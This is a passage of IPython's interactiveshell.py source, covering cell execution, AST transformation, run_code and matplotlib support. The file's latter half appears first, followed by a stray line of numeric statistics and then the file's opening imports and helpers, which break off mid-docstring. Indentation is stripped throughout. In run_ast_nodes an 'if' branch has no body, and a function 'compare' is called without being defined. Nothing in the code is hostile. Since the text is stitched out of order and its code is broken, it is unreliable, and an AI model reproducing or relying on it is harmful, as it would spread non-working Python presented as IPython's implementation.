history. For user code calling back into IPython's machinery, this
should be set to False.
silent : bool
If True, avoid side-effects, such as implicit displayhooks and
and logging. silent=True forces store_history=False.
shell_futures : bool
If True, the code will share future statements with the interactive
shell. It will both be affected by previous __future__ imports, and
any __future__ imports in the code will affect the shell. If False,
__future__ imports are not shared in either direction.
Returns
-------
result : :class:`ExecutionResult`
"""
result = None
try:
result = self._run_cell(
raw_cell, store_history, silent, shell_futures)
finally:
self.events.trigger('post_execute')
if not silent:
self.events.trigger('post_run_cell', result)
return result
def _run_cell(self, raw_cell:str, store_history:bool, silent:bool, shell_futures:bool):
"""Internal method to run a complete IPython cell."""
# we need to avoid calling self.transform_cell multiple time on the same thing
# so we need to store some results:
preprocessing_exc_tuple = None
try:
transformed_cell = self.transform_cell(raw_cell)
except Exception:
transformed_cell = raw_cell
preprocessing_exc_tuple = sys.exc_info()
assert transformed_cell is not None
coro = self.run_cell_async(
raw_cell,
store_history=store_history,
silent=silent,
shell_futures=shell_futures,
transformed_cell=transformed_cell,
preprocessing_exc_tuple=preprocessing_exc_tuple,
)
# run_cell_async is async, but may not actually need an eventloop.
# when this is the case, we want to run it using the pseudo_sync_runner
# so that code can invoke eventloops (for example via the %run , and
# `%paste` magic.
if self.trio_runner:
runner = self.trio_runner
elif self.should_run_async(
raw_cell,
transformed_cell=transformed_cell,
preprocessing_exc_tuple=preprocessing_exc_tuple,
):
runner = self.loop_runner
else:
runner = _pseudo_sync_runner
try:
return runner(coro)
except BaseException as e:
info = ExecutionInfo(raw_cell, store_history, silent, shell_futures)
result = ExecutionResult(info)
result.error_in_exec = e
self.showtraceback(running_compiled_code=True)
return result
return
def should_run_async(
self, raw_cell: str, *, transformed_cell=None, preprocessing_exc_tuple=None
) -> bool:
"""Return whether a cell should be run asynchronously via a coroutine runner
Parameters
----------
raw_cell: str
The code to be executed
Returns
-------
result: bool
Whether the code needs to be run with a coroutine runner or not
.. versionadded: 7.0
"""
if not self.autoawait:
return False
if preprocessing_exc_tuple is not None:
return False
assert preprocessing_exc_tuple is None
if transformed_cell is None:
warnings.warn(
"`should_run_async` will not call `transform_cell`"
" automatically in the future. Please pass the result to"
" `transformed_cell` argument and any exception that happen"
" during the"
"transform in `preprocessing_exc_tuple` in"
" IPython 7.17 and above.",
DeprecationWarning,
stacklevel=2,
)
try:
cell = self.transform_cell(raw_cell)
except Exception:
# any exception during transform will be raised
# prior to execution
return False
else:
cell = transformed_cell
return _should_be_async(cell)
async def run_cell_async(
self,
raw_cell: str,
store_history=False,
silent=False,
shell_futures=True,
*,
transformed_cell: Optional[str] = None,
preprocessing_exc_tuple: Optional[Any] = None
) -> ExecutionResult:
"""Run a complete IPython cell asynchronously.
Parameters
----------
raw_cell : str
The code (including IPython code such as %magic functions) to run.
store_history : bool
If True, the raw and translated cell will be stored in IPython's
history. For user code calling back into IPython's machinery, this
should be set to False.
silent : bool
If True, avoid side-effects, such as implicit displayhooks and
and logging. silent=True forces store_history=False.
shell_futures : bool
If True, the code will share future statements with the interactive
shell. It will both be affected by previous __future__ imports, and
any __future__ imports in the code will affect the shell. If False,
__future__ imports are not shared in either direction.
transformed_cell: str
cell that was passed through transformers
preprocessing_exc_tuple:
trace if the transformation failed.
Returns
-------
result : :class:`ExecutionResult`
.. versionadded: 7.0
"""
info = ExecutionInfo(
raw_cell, store_history, silent, shell_futures)
result = ExecutionResult(info)
if (not raw_cell) or raw_cell.isspace():
self.last_execution_succeeded = True
self.last_execution_result = result
return result
if silent:
store_history = False
if store_history:
result.execution_count = self.execution_count
self.events.trigger('pre_execute')
if not silent:
self.events.trigger('pre_run_cell', info)
if transformed_cell is None:
warnings.warn(
"`run_cell_async` will not call `transform_cell`"
" automatically in the future. Please pass the result to"
" `transformed_cell` argument and any exception that happen"
" during the"
"transform in `preprocessing_exc_tuple` in"
" IPython 7.17 and above.",
DeprecationWarning,
stacklevel=2,
)
# If any of our input transformation (input_transformer_manager or
# prefilter_manager) raises an exception, we store it in this variable
# so that we can display the error after logging the input and storing
# it in the history.
try:
cell = self.transform_cell(raw_cell)
except Exception:
preprocessing_exc_tuple = sys.exc_info()
cell = raw_cell # cell has to exist so it can be stored/logged
else:
preprocessing_exc_tuple = None
else:
if preprocessing_exc_tuple is None:
cell = transformed_cell
else:
cell = raw_cell
# Store raw and processed history
if store_history:
self.history_manager.store_inputs(self.execution_count,
cell, raw_cell)
if not silent:
self.logger.log(cell, raw_cell)
# Display the exception if input processing failed.
if preprocessing_exc_tuple is not None:
self.showtraceback(preprocessing_exc_tuple)
if store_history:
self.execution_count += 1
return error_before_exec(preprocessing_exc_tuple[1])
# Our own compiler remembers the __future__ environment. If we want to
# run code with a separate __future__ environment, use the default
# compiler
compiler = self.compile if shell_futures else self.compiler_class()
_run_async = False
with self.builtin_trap:
cell_name = self.compile.cache(
cell, self.execution_count, raw_code=raw_cell
)
with self.display_trap:
# Compile to bytecode
try:
if sys.version_info < (3,8) and self.autoawait:
if _should_be_async(cell):
# the code AST below will not be user code: we wrap it
# in an `async def`. This will likely make some AST
# transformer below miss some transform opportunity and
# introduce a small coupling to run_code (in which we
# bake some assumptions of what _ast_asyncify returns.
# they are ways around (like grafting part of the ast
# later:
# - Here, return code_ast.body[0].body[1:-1], as well
# as last expression in return statement which is
# the user code part.
# - Let it go through the AST transformers, and graft
# - it back after the AST transform
# But that seem unreasonable, at least while we
# do not need it.
code_ast = _ast_asyncify(cell, 'async-def-wrapper')
_run_async = True
else:
code_ast = compiler.ast_parse(cell, filename=cell_name)
else:
code_ast = compiler.ast_parse(cell, filename=cell_name)
except self.custom_exceptions as e:
etype, value, tb = sys.exc_info()
self.CustomTB(etype, value, tb)
return error_before_exec(e)
except IndentationError as e:
self.showindentationerror()
return error_before_exec(e)
except (OverflowError, SyntaxError, ValueError, TypeError,
MemoryError) as e:
self.showsyntaxerror()
return error_before_exec(e)
# Apply AST transformations
try:
code_ast = self.transform_ast(code_ast)
except InputRejected as e:
self.showtraceback()
return error_before_exec(e)
# Give the displayhook a reference to our ExecutionResult so it
# can fill in the output value.
self.displayhook.exec_result = result
# Execute the user code
interactivity = "none" if silent else self.ast_node_interactivity
if _run_async:
interactivity = 'async'
has_raised = await self.run_ast_nodes(code_ast.body, cell_name,
interactivity=interactivity, compiler=compiler, result=result)
self.last_execution_succeeded = not has_raised
self.last_execution_result = result
# Reset this so later displayed values do not modify the
# ExecutionResult
self.displayhook.exec_result = None
if store_history:
# Write output to the database. Does nothing unless
# history output logging is enabled.
self.history_manager.store_output(self.execution_count)
# Each cell is a *single* input, regardless of how many lines it has
self.execution_count += 1
return result
def transform_cell(self, raw_cell):
"""Transform an input cell before parsing it.
Static transformations, implemented in IPython.core.inputtransformer2,
deal with things like ``%magic`` and ``!system`` commands.
These run on all input.
Dynamic transformations, for things like unescaped magics and the exit
autocall, depend on the state of the interpreter.
These only apply to single line inputs.
These string-based transformations are followed by AST transformations;
see :meth:`transform_ast`.
"""
# Static input transformations
cell = self.input_transformer_manager.transform_cell(raw_cell)
if len(cell.splitlines()) == 1:
# Dynamic transformations - only applied for single line commands
with self.builtin_trap:
# use prefilter_lines to handle trailing newlines
# restore trailing newline for ast.parse
cell = self.prefilter_manager.prefilter_lines(cell) + '\n'
lines = cell.splitlines(keepends=True)
for transform in self.input_transformers_post:
lines = transform(lines)
cell = ''.join(lines)
return cell
def transform_ast(self, node):
"""Apply the AST transformations from self.ast_transformers
Parameters
----------
node : ast.Node
The root node to be transformed. Typically called with the ast.Module
produced by parsing user input.
Returns
-------
An ast.Node corresponding to the node it was called with. Note that it
may also modify the passed object, so don't rely on references to the
original AST.
"""
for transformer in self.ast_transformers:
try:
node = transformer.visit(node)
except InputRejected:
# User-supplied AST transformers can reject an input by raising
# an InputRejected. Short-circuit in this case so that we
# don't unregister the transform.
raise
except Exception:
warn("AST transformer %r threw an error. It will be unregistered." % transformer)
self.ast_transformers.remove(transformer)
if self.ast_transformers:
ast.fix_missing_locations(node)
return node
async def run_ast_nodes(self, nodelist:ListType[AST], cell_name:str, interactivity='last_expr',
compiler=compile, result=None):
"""Run a sequence of AST nodes. The execution mode depends on the
interactivity parameter.
Parameters
----------
nodelist : list
A sequence of AST nodes to run.
cell_name : str
Will be passed to the compiler as the filename of the cell. Typically
the value returned by ip.compile.cache(cell).
interactivity : str
'all', 'last', 'last_expr' , 'last_expr_or_assign' or 'none',
specifying which nodes should be run interactively (displaying output
from expressions). 'last_expr' will run the last node interactively
only if it is an expression (i.e. expressions in loops or other blocks
are not displayed) 'last_expr_or_assign' will run the last expression
or the last assignment. Other values for this parameter will raise a
ValueError.
Experimental value: 'async' Will try to run top level interactive
async/await code in default runner, this will not respect the
interactivity setting and will only run the last node if it is an
expression.
compiler : callable
A function with the same interface as the built-in compile(), to turn
the AST nodes into code objects. Default is the built-in compile().
result : ExecutionResult, optional
An object to store exceptions that occur during execution.
Returns
-------
True if an exception occurred while running code, False if it finished
running.
"""
if not nodelist:
return
if interactivity == 'last_expr_or_assign':
if isinstance(nodelist[-1], _assign_nodes):
asg = nodelist[-1]
if isinstance(asg, ast.Assign) and len(asg.targets) == 1:
target = asg.targets[0]
elif isinstance(asg, _single_targets_nodes):
target = asg.target
else:
target = None
if isinstance(target, ast.Name):
nnode = ast.Expr(ast.Name(target.id, ast.Load()))
ast.fix_missing_locations(nnode)
nodelist.append(nnode)
interactivity = 'last_expr'
_async = False
if interactivity == 'last_expr':
if isinstance(nodelist[-1], ast.Expr):
interactivity = "last"
else:
interactivity = "none"
if interactivity == 'none':
to_run_exec, to_run_interactive = nodelist, []
elif interactivity == 'last':
to_run_exec, to_run_interactive = nodelist[:-1], nodelist[-1:]
elif interactivity == 'all':
to_run_exec, to_run_interactive = [], nodelist
elif interactivity == 'async':
to_run_exec, to_run_interactive = [], nodelist
_async = True
else:
raise ValueError("Interactivity was %r" % interactivity)
try:
if _async and sys.version_info > (3,8):
raise ValueError("This branch should never happen on Python 3.8 and above, "
"please try to upgrade IPython and open a bug report with your case.")
if _async:
# If interactivity is async the semantics of run_code are
# completely different Skip usual machinery.
mod = Module(nodelist, [])
async_wrapper_code = compiler(mod, cell_name, 'exec')
exec(async_wrapper_code, self.user_global_ns, self.user_ns)
async_code = removed_co_newlocals(self.user_ns.pop('async-def-wrapper')).__code__
if (await self.run_code(async_code, result, async_=True)):
return True
else:
if sys.version_info > (3, 8):
else:
# refactor that to just change the mod constructor.
to_run = []
for node in to_run_exec:
to_run.append((node, 'exec'))
for node in to_run_interactive:
to_run.append((node, 'single'))
for node,mode in to_run:
if mode == 'exec':
mod = Module([node], [])
elif mode == 'single':
mod = ast.Interactive([node])
with compiler.extra_flags(getattr(ast, 'PyCF_ALLOW_TOP_LEVEL_AWAIT', 0x0) if self.autoawait else 0x0):
code = compiler(mod, cell_name, mode)
asy = compare(code)
if (await self.run_code(code, result, async_=asy)):
return True
# Flush softspace
if softspace(sys.stdout, 0):
print()
except:
# It's possible to have exceptions raised here, typically by
# compilation of odd code (such as a naked 'return' outside a
# function) that did parse but isn't valid. Typically the exception
# is a SyntaxError, but it's safest just to catch anything and show
# the user a traceback.
# We do only one try/except outside the loop to minimize the impact
# on runtime, and also because if any node in the node list is
# broken, we should stop execution completely.
if result:
result.error_before_exec = sys.exc_info()[1]
self.showtraceback()
return True
return False
def _async_exec(self, code_obj: types.CodeType, user_ns: dict):
"""
Evaluate an asynchronous code object using a code runner
Fake asynchronous execution of code_object in a namespace via a proxy namespace.
Returns coroutine object, which can be executed via async loop runner
WARNING: The semantics of `async_exec` are quite different from `exec`,
in particular you can only pass a single namespace. It also return a
handle to the value of the last things returned by code_object.
"""
return eval(code_obj, user_ns)
async def run_code(self, code_obj, result=None, *, async_=False):
"""Execute a code object.
When an exception occurs, self.showtraceback() is called to display a
traceback.
Parameters
----------
code_obj : code object
A compiled code object, to be executed
result : ExecutionResult, optional
An object to store exceptions that occur during execution.
async_ : Bool (Experimental)
Attempt to run top-level asynchronous code in a default loop.
Returns
-------
False : successful execution.
True : an error occurred.
"""
# special value to say that anything above is IPython and should be
# hidden.
__tracebackhide__ = "__ipython_bottom__"
# Set our own excepthook in case the user code tries to call it
# directly, so that the IPython crash handler doesn't get triggered
old_excepthook, sys.excepthook = sys.excepthook, self.excepthook
# we save the original sys.excepthook in the instance, in case config
# code (such as magics) needs access to it.
self.sys_excepthook = old_excepthook
outflag = True # happens in more places, so it's easier as default
try:
try:
self.hooks.pre_run_code_hook()
if async_ and sys.version_info < (3,8):
last_expr = (await self._async_exec(code_obj, self.user_ns))
code = compile('last_expr', 'fake', "single")
exec(code, {'last_expr': last_expr})
elif async_ :
await eval(code_obj, self.user_global_ns, self.user_ns)
else:
exec(code_obj, self.user_global_ns, self.user_ns)
finally:
# Reset our crash handler in place
sys.excepthook = old_excepthook
except SystemExit as e:
if result is not None:
result.error_in_exec = e
self.showtraceback(exception_only=True)
warn("To exit: use 'exit', 'quit', or Ctrl-D.", stacklevel=1)
except self.custom_exceptions:
etype, value, tb = sys.exc_info()
if result is not None:
result.error_in_exec = value
self.CustomTB(etype, value, tb)
except:
if result is not None:
result.error_in_exec = sys.exc_info()[1]
self.showtraceback(running_compiled_code=True)
else:
outflag = False
return outflag
# For backwards compatibility
runcode = run_code
def check_complete(self, code: str) -> Tuple[str, str]:
"""Return whether a block of code is ready to execute, or should be continued
Parameters
----------
source : string
Python input code, which can be multiline.
Returns
-------
status : str
One of 'complete', 'incomplete', or 'invalid' if source is not a
prefix of valid code.
indent : str
When status is 'incomplete', this is some whitespace to insert on
the next line of the prompt.
"""
status, nspaces = self.input_transformer_manager.check_complete(code)
return status, ' ' * (nspaces or 0)
#-------------------------------------------------------------------------
# Things related to GUI support and pylab
#-------------------------------------------------------------------------
active_eventloop = None
def enable_matplotlib(self, gui=None):
"""Enable interactive matplotlib and inline figure support.
This takes the following steps:
1. select the appropriate eventloop and matplotlib backend
2. set up matplotlib for interactive use with that backend
3. configure formatters for inline figure display
4. enable the selected gui eventloop
Parameters
----------
gui : optional, string
If given, dictates the choice of matplotlib GUI backend to use
(should be one of IPython's supported backends, 'qt', 'osx', 'tk',
'gtk', 'wx' or 'inline'), otherwise we use the default chosen by
matplotlib (as dictated by the matplotlib build-time options plus the
user's matplotlibrc configuration file). Note that not all backends
make sense in all contexts, for example a terminal ipython can't
display figures inline.
"""
from IPython.core import pylabtools as pt
gui, backend = pt.find_gui_and_backend(gui, self.pylab_gui_select)
if gui != 'inline':
# If we have our first gui selection, store it
if self.pylab_gui_select is None:
self.pylab_gui_select = gui
# Otherwise if they are different
elif gui != self.pylab_gui_select:
print('Warning: Cannot change to a different GUI toolkit: %s.'
' Using %s instead.' % (gui, self.pylab_gui_select))
gui, backend = pt.find_gui_and_backend(self.pylab_gui_select)
pt.activate_matplotlib(backend)
pt.configure_inline_support(self, backend)
# Now we must activate the gui pylab wants to use, and fix %run to take
# plot updates into account
self.enable_gui(gui)
self.magics_manager.registry['ExecutionMagics'].default_runner = \
pt.mpl_runner(self.safe_execfile)
return gui, backend
def enable_pylab(self, gui=None, import_all=True, welcome_message=False):
"""Activate pylab support at runtime.
This turns on support for matplotlib, preloads into the interactive
namespace all of numpy and pylab, and configures IPython to correctly
interact with the GUI event loop. The GUI backend to be used can be
optionally selected with the optional ``gui`` argument.
This method only adds preloading the namespace to InteractiveShell.enable_matplotlib.
Parameters
----------
gui : optional, string
If given, dictates the choice of matplotlib GUI backend to use
(should be one of IPython's supported backends, 'qt', 'osx', 'tk',
'gtk', 'wx' or 'inline'), otherwise we use the default chosen by
matplotlib (as dictated by the matplotlib build-time options plus the
user's matplotlibrc configuration file). Note that not all backends
make sense in all contexts, for example a terminal ipython can't
display figures inline.
import_all : optional, bool, default: True
Whether to do `from numpy import *` and `from pylab import *`
in addition to module imports.
welcome_message : deprecated
This argument is ignored, no welcome message will be displayed.
"""
from IPython.core.pylabtools import import_pylab
gui, backend = self.enable_matplotlib(gui)
# We want to prevent the loading of pylab to pollute the user's
# namespace as shown by the %who* magics, so we execute the activation
# code in an empty namespace, and we update *both* user_ns and
# user_ns_hidden with this information.
ns = {}
import_pylab(ns, import_all)
# warn about clobbered names
ignored = {"__builtins__"}
both = set(ns).intersection(self.user_ns).difference(ignored)
clobbered = [ name for name in both if self.user_ns[name] is not ns[name] ]
self.user_ns.update(ns)
self.user_ns_hidden.update(ns)
return gui, backend, clobbered
#-------------------------------------------------------------------------
# Utilities
#-------------------------------------------------------------------------
def var_expand(self, cmd, depth=0, formatter=DollarFormatter()):
"""Expand python variables in a string.
The depth argument indicates how many frames above the caller should
be walked to look for the local namespace where to expand variables.
The global namespace for expansion is always the user's interactive
namespace.
"""
ns = self.user_ns.copy()
try:
frame = sys._getframe(depth+1)
except ValueError:
# This is thrown if there aren't that many frames on the stack,
# e.g. if a script called run_line_magic() directly.
pass
else:
ns.update(frame.f_locals)
try:
# We have to use .vformat() here, because 'self' is a valid and common
# name, and expanding **ns for .format() would make it collide with
# the 'self' argument of the method.
cmd = formatter.vformat(cmd, args=[], kwargs=ns)
except Exception:
# if formatter couldn't format, just let it go untransformed
pass
return cmd
def mktempfile(self, data=None, prefix='ipython_edit_'):
"""Make a new tempfile and return its filename.
This makes a call to tempfile.mkstemp (created in a tempfile.mkdtemp),
but it registers the created filename internally so ipython cleans it up
at exit time.
Optional inputs:
- data(None): if data is given, it gets written out to the temp file
immediately, and the file is closed again."""
dirname = tempfile.mkdtemp(prefix=prefix)
self.tempdirs.append(dirname)
handle, filename = tempfile.mkstemp('.py', prefix, dir=dirname)
os.close(handle) # On Windows, there can only be one open handle on a file
self.tempfiles.append(filename)
if data:
with open(filename, 'w') as tmp_file:
tmp_file.write(data)
return filename
@undoc
def write(self,data):
"""DEPRECATED: Write a string to the default output"""
warn('InteractiveShell.write() is deprecated, use sys.stdout instead',
DeprecationWarning, stacklevel=2)
sys.stdout.write(data)
@undoc
def write_err(self,data):
"""DEPRECATED: Write a string to the default error output"""
warn('InteractiveShell.write_err() is deprecated, use sys.stderr instead',
DeprecationWarning, stacklevel=2)
sys.stderr.write(data)
def show_usage(self):
"""Show a usage message"""
page.page(IPython.core.usage.interactive_usage)
def extract_input_lines(self, range_str, raw=False):
"""Return as a string a set of input history slices.
Parameters
----------
range_str : string
The set of slices is given as a string, like "~5/6-~4/2 4:8 9",
since this function is for use by magic functions which get their
arguments as strings. The number before the / is the session
number: ~n goes n back from the current session.
raw : bool, optional
By default, the processed input is used. If this is true, the raw
input history is used instead.
Notes
-----
Slices can be described with two notations:
* ``N:M`` -> standard python form, means including items N...(M-1).
* ``N-M`` -> include items N..M (closed endpoint).
"""
lines = self.history_manager.get_range_by_str(range_str, raw=raw)
return "\n".join(x for _, _, x in lines)
def find_user_code(self, target, raw=True, py_only=False, skip_encoding_cookie=True, search_ns=False):
"""Get a code string from history, file, url, or a string or macro.
This is mainly used by magic functions.
Parameters
----------
target : str
A string specifying code to retrieve. This will be tried respectively
as: ranges of input history (see %history for syntax), url,
corresponding .py file, filename, or an expression evaluating to a
string or Macro in the user namespace.
raw : bool
If true (default), retrieve raw history. Has no effect on the other
retrieval mechanisms.
py_only : bool (default False)
Only try to fetch python code, do not try alternative methods to decode file
if unicode fails.
Returns
-------
A string of code.
ValueError is raised if nothing is found, and TypeError if it evaluates
to an object of another type. In each case, .args[0] is a printable
message.
"""
code = self.extract_input_lines(target, raw=raw) # Grab history
if code:
return code
try:
if target.startswith(('http://', 'https://')):
return openpy.read_py_url(target, skip_encoding_cookie=skip_encoding_cookie)
except UnicodeDecodeError:
if not py_only :
# Deferred import
from urllib.request import urlopen
response = urlopen(target)
return response.read().decode('latin1')
raise ValueError(("'%s' seem to be unreadable.") % target)
potential_target = [target]
try :
potential_target.insert(0,get_py_filename(target))
except IOError:
pass
for tgt in potential_target :
if os.path.isfile(tgt): # Read file
try :
return openpy.read_py_file(tgt, skip_encoding_cookie=skip_encoding_cookie)
except UnicodeDecodeError :
if not py_only :
with io_open(tgt,'r', encoding='latin1') as f :
return f.read()
raise ValueError(("'%s' seem to be unreadable.") % target)
elif os.path.isdir(os.path.expanduser(tgt)):
raise ValueError("'%s' is a directory, not a regular file." % target)
if search_ns:
# Inspect namespace to load object source
object_info = self.object_inspect(target, detail_level=1)
if object_info['found'] and object_info['source']:
return object_info['source']
try: # User namespace
codeobj = eval(target, self.user_ns)
except Exception:
raise ValueError(("'%s' was not found in history, as a file, url, "
"nor in the user namespace.") % target)
if isinstance(codeobj, str):
return codeobj
elif isinstance(codeobj, Macro):
return codeobj.value
raise TypeError("%s is neither a string nor a macro." % target,
codeobj)
#-------------------------------------------------------------------------
# Things related to IPython exiting
#-------------------------------------------------------------------------
def atexit_operations(self):
"""This will be executed at the time of exit.
Cleanup operations and saving of persistent data that is done
unconditionally by IPython should be performed here.
For things that may depend on startup flags or platform specifics (such
as having readline or not), register a separate atexit function in the
code that has the appropriate information, rather than trying to
clutter
"""
# Close the history session (this stores the end time and line count)
# this must be *before* the tempfile cleanup, in case of temporary
# history db
self.history_manager.end_session()
# Cleanup all tempfiles and folders left around
for tfile in self.tempfiles:
try:
os.unlink(tfile)
except OSError:
pass
for tdir in self.tempdirs:
try:
os.rmdir(tdir)
except OSError:
pass
# Clear all user namespaces to release all references cleanly.
self.reset(new_session=False)
# Run user hooks
self.hooks.shutdown_hook()
# Overridden in terminal subclass to change prompts
class InteractiveShellABC(metaclass=abc.ABCMeta):
"""An abstract base class for InteractiveShell."""
InteractiveShellABC.register(InteractiveShell)
| 40.236911 | 147 | 0.592076 | # -*- coding: utf-8 -*-
"""Main IPython class."""
#-----------------------------------------------------------------------------
# Copyright (C) 2001 Janko Hauser <jhauser@zscout.de>
# Copyright (C) 2001-2007 Fernando Perez. <fperez@colorado.edu>
# Copyright (C) 2008-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
import abc
import ast
import atexit
import builtins as builtin_mod
import functools
import inspect
import os
import re
import runpy
import sys
import tempfile
import traceback
import types
import subprocess
import warnings
from io import open as io_open
from pickleshare import PickleShareDB
from traitlets.config.configurable import SingletonConfigurable
from traitlets.utils.importstring import import_item
from IPython.core import oinspect
from IPython.core import magic
from IPython.core import page
from IPython.core import prefilter
from IPython.core import ultratb
from IPython.core.alias import Alias, AliasManager
from IPython.core.autocall import ExitAutocall
from IPython.core.builtin_trap import BuiltinTrap
from IPython.core.events import EventManager, available_events
from IPython.core.compilerop import CachingCompiler, check_linecache_ipython
from IPython.core.debugger import Pdb
from IPython.core.display_trap import DisplayTrap
from IPython.core.displayhook import DisplayHook
from IPython.core.displaypub import DisplayPublisher
from IPython.core.error import InputRejected, UsageError
from IPython.core.extensions import ExtensionManager
from IPython.core.formatters import DisplayFormatter
from IPython.core.history import HistoryManager
from IPython.core.inputtransformer2 import ESC_MAGIC, ESC_MAGIC2
from IPython.core.logger import Logger
from IPython.core.macro import Macro
from IPython.core.payload import PayloadManager
from IPython.core.prefilter import PrefilterManager
from IPython.core.profiledir import ProfileDir
from IPython.core.usage import default_banner
from IPython.display import display
from IPython.testing.skipdoctest import skip_doctest
from IPython.utils import PyColorize
from IPython.utils import io
from IPython.utils import py3compat
from IPython.utils import openpy
from IPython.utils.decorators import undoc
from IPython.utils.io import ask_yes_no
from IPython.utils.ipstruct import Struct
from IPython.paths import get_ipython_dir
from IPython.utils.path import get_home_dir, get_py_filename, ensure_dir_exists
from IPython.utils.process import system, getoutput
from IPython.utils.strdispatch import StrDispatch
from IPython.utils.syspathcontext import prepended_to_syspath
from IPython.utils.text import format_screen, LSString, SList, DollarFormatter
from IPython.utils.tempdir import TemporaryDirectory
from traitlets import (
Integer, Bool, CaselessStrEnum, Enum, List, Dict, Unicode, Instance, Type,
observe, default, validate, Any
)
from warnings import warn
from logging import error
import IPython.core.hooks
from typing import List as ListType, Tuple, Optional
from ast import AST
# NoOpContext is deprecated, but ipykernel imports it from here.
# See https://github.com/ipython/ipykernel/issues/157
# (2016, let's try to remove than in IPython 8.0)
from IPython.utils.contexts import NoOpContext
try:
import docrepr.sphinxify as sphx
def sphinxify(doc):
with TemporaryDirectory() as dirname:
return {
'text/html': sphx.sphinxify(doc, dirname),
'text/plain': doc
}
except ImportError:
sphinxify = None
class ProvisionalWarning(DeprecationWarning):
"""
Warning class for unstable features
"""
pass
if sys.version_info > (3,8):
from ast import Module
else :
# mock the new API, ignore second argument
# see https://github.com/ipython/ipython/issues/11590
from ast import Module as OriginalModule
Module = lambda nodelist, type_ignores: OriginalModule(nodelist)
if sys.version_info > (3,6):
_assign_nodes = (ast.AugAssign, ast.AnnAssign, ast.Assign)
_single_targets_nodes = (ast.AugAssign, ast.AnnAssign)
else:
_assign_nodes = (ast.AugAssign, ast.Assign )
_single_targets_nodes = (ast.AugAssign, )
#-----------------------------------------------------------------------------
# Await Helpers
#-----------------------------------------------------------------------------
def removed_co_newlocals(function:types.FunctionType) -> types.FunctionType:
"""Return a function that do not create a new local scope.
Given a function, create a clone of this function where the co_newlocal flag
has been removed, making this function code actually run in the sourounding
scope.
We need this in order to run asynchronous code in user level namespace.
"""
from types import CodeType, FunctionType
CO_NEWLOCALS = 0x0002
code = function.__code__
new_co_flags = code.co_flags & ~CO_NEWLOCALS
if sys.version_info > (3, 8, 0, 'alpha', 3):
new_code = code.replace(co_flags=new_co_flags)
else:
new_code = CodeType(
code.co_argcount,
code.co_kwonlyargcount,
code.co_nlocals,
code.co_stacksize,
new_co_flags,
code.co_code,
code.co_consts,
code.co_names,
code.co_varnames,
code.co_filename,
code.co_name,
code.co_firstlineno,
code.co_lnotab,
code.co_freevars,
code.co_cellvars
)
return FunctionType(new_code, globals(), function.__name__, function.__defaults__)
# we still need to run things using the asyncio eventloop, but there is no
# async integration
from .async_helpers import (_asyncio_runner, _asyncify, _pseudo_sync_runner)
from .async_helpers import _curio_runner, _trio_runner, _should_be_async
def _ast_asyncify(cell:str, wrapper_name:str) -> ast.Module:
"""
Parse a cell with top-level await and modify the AST to be able to run it later.
Parameter
---------
cell: str
The code cell to asyncronify
wrapper_name: str
The name of the function to be used to wrap the passed `cell`. It is
advised to **not** use a python identifier in order to not pollute the
global namespace in which the function will be ran.
Return
------
A module object AST containing **one** function named `wrapper_name`.
The given code is wrapped in a async-def function, parsed into an AST, and
the resulting function definition AST is modified to return the last
expression.
The last expression or await node is moved into a return statement at the
end of the function, and removed from its original location. If the last
node is not Expr or Await nothing is done.
The function `__code__` will need to be later modified (by
``removed_co_newlocals``) in a subsequent step to not create new `locals()`
meaning that the local and global scope are the same, ie as if the body of
the function was at module level.
Lastly a call to `locals()` is made just before the last expression of the
function, or just after the last assignment or statement to make sure the
global dict is updated as python function work with a local fast cache which
is updated only on `local()` calls.
"""
from ast import Expr, Await, Return
if sys.version_info >= (3,8):
return ast.parse(cell)
tree = ast.parse(_asyncify(cell))
function_def = tree.body[0]
function_def.name = wrapper_name
try_block = function_def.body[0]
lastexpr = try_block.body[-1]
if isinstance(lastexpr, (Expr, Await)):
try_block.body[-1] = Return(lastexpr.value)
ast.fix_missing_locations(tree)
return tree
#-----------------------------------------------------------------------------
# Globals
#-----------------------------------------------------------------------------
# compiled regexps for autoindent management
dedent_re = re.compile(r'^\s+raise|^\s+return|^\s+pass')
#-----------------------------------------------------------------------------
# Utilities
#-----------------------------------------------------------------------------
@undoc
def softspace(file, newvalue):
"""Copied from code.py, to remove the dependency"""
oldvalue = 0
try:
oldvalue = file.softspace
except AttributeError:
pass
try:
file.softspace = newvalue
except (AttributeError, TypeError):
# "attribute-less object" or "read-only attributes"
pass
return oldvalue
@undoc
def no_op(*a, **kw):
pass
class SpaceInInput(Exception): pass
def get_default_colors():
"DEPRECATED"
warn('get_default_color is deprecated since IPython 5.0, and returns `Neutral` on all platforms.',
DeprecationWarning, stacklevel=2)
return 'Neutral'
class SeparateUnicode(Unicode):
r"""A Unicode subclass to validate separate_in, separate_out, etc.
This is a Unicode based trait that converts '0'->'' and ``'\\n'->'\n'``.
"""
def validate(self, obj, value):
if value == '0': value = ''
value = value.replace('\\n','\n')
return super(SeparateUnicode, self).validate(obj, value)
@undoc
class DummyMod(object):
"""A dummy module used for IPython's interactive module when
a namespace must be assigned to the module's __dict__."""
__spec__ = None
class ExecutionInfo(object):
"""The arguments used for a call to :meth:`InteractiveShell.run_cell`
Stores information about what is going to happen.
"""
raw_cell = None
store_history = False
silent = False
shell_futures = True
def __init__(self, raw_cell, store_history, silent, shell_futures):
self.raw_cell = raw_cell
self.store_history = store_history
self.silent = silent
self.shell_futures = shell_futures
def __repr__(self):
name = self.__class__.__qualname__
raw_cell = ((self.raw_cell[:50] + '..')
if len(self.raw_cell) > 50 else self.raw_cell)
return '<%s object at %x, raw_cell="%s" store_history=%s silent=%s shell_futures=%s>' %\
(name, id(self), raw_cell, self.store_history, self.silent, self.shell_futures)
class ExecutionResult(object):
"""The result of a call to :meth:`InteractiveShell.run_cell`
Stores information about what took place.
"""
execution_count = None
error_before_exec = None
error_in_exec = None
info = None
result = None
def __init__(self, info):
self.info = info
@property
def success(self):
return (self.error_before_exec is None) and (self.error_in_exec is None)
def raise_error(self):
"""Reraises error if `success` is `False`, otherwise does nothing"""
if self.error_before_exec is not None:
raise self.error_before_exec
if self.error_in_exec is not None:
raise self.error_in_exec
def __repr__(self):
name = self.__class__.__qualname__
return '<%s object at %x, execution_count=%s error_before_exec=%s error_in_exec=%s info=%s result=%s>' %\
(name, id(self), self.execution_count, self.error_before_exec, self.error_in_exec, repr(self.info), repr(self.result))
class InteractiveShell(SingletonConfigurable):
"""An enhanced, interactive shell for Python."""
_instance = None
ast_transformers = List([], help=
"""
A list of ast.NodeTransformer subclass instances, which will be applied
